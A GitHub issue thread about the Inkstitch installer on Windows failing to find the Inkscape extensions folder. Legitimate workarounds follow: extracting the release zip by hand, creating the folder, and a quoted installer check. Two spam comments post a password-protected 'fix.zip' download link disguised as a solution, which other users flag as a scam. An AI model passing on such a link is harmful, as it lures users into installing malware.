### ISSUE TITLE
Error: Inkscape Extensions folder not found!

### ISSUE THREAD

**Issue by printjesus** [inkstitch/inkstitch#3173]
Trying to deploy Inkstitch extensions in an enterprise environment to multiple PCs running Inkscape via script. In testing running the .EXE installer manually, ran into the following error:

Error: Inkscape Extensions folder not found! Install and then run Inkscape to create the extension folder. 

I can confirm the extensions folder is under my user profile. When running the executable the error instantly appears. 

OS: Windows 11 23H2 Enterprise
Inkscape Ver: 1.3.2

![image](https://github.com/user-attachments/assets/a1070008-dfbc-4fb9-b8d5-c341a3c06a5a)

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by printjesus** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

What exactly is contained in that zip file?

**Comment by capellancitizen** [comment]
That post is a phishing scam or virus or something. DO NOT open it.

**Comment by printjesus** [comment]
> That post is a phishing scam or virus or something. DO NOT open it. Unfortunately we've gotten an influx of bots/compromised accounts the last couple of days.

Yeah I figured. Thanks for the heads up.

**Comment by capellancitizen** [comment]
As for your actual issue, could you provide any other details about how you're installing Inkstitch via script? Additionally, could you see if the installer works correctly if you manually run it yourself?

**Comment by printjesus** [comment]
> As for your actual issue, could you provide any other details about how you're installing Inkstitch via script? Additionally, could you see if the installer works correctly if you manually run it yourself?

So, I am manually running the installer. I only mentioned the script as that is the end goal but not what I am doing to test the install.

**Comment by kaalleen** [comment]
Hm, maybe you use a custom, non standard location for the extension folder. If the installer doesn't work for you, you can also grab the windows zip file (not the one from the spam message of course) and unzip it into your extensions folder. The installer really does not do anything else than that.

Here is the link to the latest release packages https://github.com/inkstitch/inkstitch/releases/tag/v3.1.0

**Comment by printjesus** [comment]
> Hm, maybe you use a custom, non standard location for the extension folder. If the installer doesn't work for you, you can also grab the windows zip file (not the one from the spam message of course) and unzip it into your extensions folder. The installer really does not do anything else than that.
> 
> Here is the link to the latest release packages https://github.com/inkstitch/inkstitch/releases/tag/v3.1.0

This is the path for the extensions folder currently: C:\Users\%username%\AppData\Roaming\inkscape\extensions

I was able to extract the files from the link you posted into the extensions folder, opened Inkscape and saw the Inkstitch extension listed. Looks like we are good to go. Thanks for the assist.

**Comment by kaalleen** [comment]
The location is pretty standard. No idea what was going on.
If this will show up more frequently we will have to look into it. For now I am going to close the issue, since it looks as if we could find a workaround for you. Thanks for the feedback!

**Comment by martinjaime** [comment]
@kaalleen, I know this is old, but I wanted to point out that I came across this too. I got around it by manually creating the extensions folder where the installer expected it and tried to run the installer again.

**Comment by stoufa** [comment]
same here! 🖐️ the zip workaround worked for me, though!

**Comment by kaalleen** [comment]
How did you install inkscape?

**Comment by IPreferWater** [comment]
I used the .exe in the list of release

[inkstitch-v3.2.2-windows-64bit.exe](https://github.com/inkstitch/inkstitch/releases/download/v3.2.2/inkstitch-v3.2.2-windows-64bit.exe)

I also tried 3.1.0 with same issue

In the code 

```
{ ///////////////////////////////////////////////////////////////////// }
function InitializeSetup(): Boolean;
begin
  Result := True;

  if DirExists(ExpandConstant('{userappdata}\inkscape\extensions\')) then
  Log('Found Inks')
  else
  begin
    MsgBox('Error: Inkscape Extensions folder not found! Install and then run Inkscape to create the extension folder.', mbInformation, MB_OK);
    Result := False;
  end;
end;
```
sorry I don't really know how to try iss file but it seems that we only check if the Directory is existing, otherwise MsgBox ?*

I could be wrong on this !

I also could fix the issue with manual directory create
